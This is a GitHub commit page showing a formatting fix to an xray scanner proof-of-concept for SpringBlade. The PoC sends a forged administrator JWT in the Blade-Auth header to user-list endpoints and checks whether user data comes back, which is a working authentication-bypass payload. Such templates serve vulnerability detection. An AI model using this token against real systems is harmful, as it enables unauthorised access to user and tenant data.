Skip to content

Commit

Permalink
Update springblade-jwt.yml
Browse files Browse the repository at this point in the history
fix格式
  • Loading branch information
youki992 committed Feb 28, 2024
1 parent 76e3b3a commit 2f68109
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions pocs_yml/xrayFiles/springblade-jwt.yml
Original file line number Diff line number Diff line change
Expand Up @@ -9,14 +9,14 @@ rules:
headers:
Blade-Auth: >-
bearer eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoiMSIsIm5hbWUiOiJhZG1pbiIsInJvbGVfbmFtZSI6ImFkbWluaXN0cmF0b3IifQ.3KqH3YSCVDA2wpD1JB4p5iOqFK_qa3pjuwIQOpSYB1e_CEQL4g-Ulkn_oJyOGBtBvJQn_qiMn59jFbMGnNHUwA
expression: response.status == 200 && response.body.bcontains(b"tenantId") && response.body.bcontains(b"deptId")
expression: response.status == 200 && response.body.bcontains(b"tenantId") && response.body.bcontains(b"deptId")
r1:
request:
method: GET
path: /blade-user/user-list
headers:
Blade-Auth: >-
bearer eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoiMSIsIm5hbWUiOiJhZG1pbiIsInJvbGVfbmFtZSI6ImFkbWluaXN0cmF0b3IifQ.3KqH3YSCVDA2wpD1JB4p5iOqFK_qa3pjuwIQOpSYB1e_CEQL4g-Ulkn_oJyOGBtBvJQn_qiMn59jFbMGnNHUwA
expression: response.status == 200 && response.body.bcontains(b"tenantId") && response.body.bcontains(b"deptId")
expression: response.status == 200 && response.body.bcontains(b"tenantId") && response.body.bcontains(b"deptId")
expression: r0() || r1()

0 comments on commit 2f68109

Please sign in to comment.